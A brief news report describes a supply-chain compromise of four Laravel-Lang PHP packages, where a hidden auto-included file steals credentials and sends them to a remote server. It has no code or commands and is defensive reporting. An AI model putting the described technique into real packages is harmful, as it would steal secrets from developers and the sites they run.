Supply Chain Attack Targets Multiple Laravel-Lang PHP Packages

Cybersecurity researchers have uncovered a fresh supply‑chain attack that has compromised four PHP packages from the Laravel‑Lang project. The packages—laravel‑lang/lang, laravel‑lang/http‑statuses, laravel‑lang/attributes, and laravel‑lang/actions—were infected with a credential‑stealing framework that harvests usernames, passwords, and API tokens from applications that import them. The attackers inserted malicious tags into the package metadata, allowing the framework to execute when the packages are installed or updated. The attack is active and has already been observed in the wild, with attackers leveraging the framework to exfiltrate credentials from compromised sites. The compromised packages are widely used in Laravel applications, meaning the impact could reach thousands of developers and production sites. The researchers recommend immediate patching and a thorough audit of all dependencies that rely on these packages.

The credential‑stealing framework is delivered via a hidden PHP file that is automatically included when the packages are loaded. The malicious code logs environment variables, session data, and database credentials, then sends them to a remote command‑and‑control server. The attack pattern is consistent across all four packages, indicating a coordinated effort by the threat actors. The researchers have provided a list of affected package versions and a remediation guide that includes updating to the latest secure releases and scanning for similar supply‑chain vulnerabilities.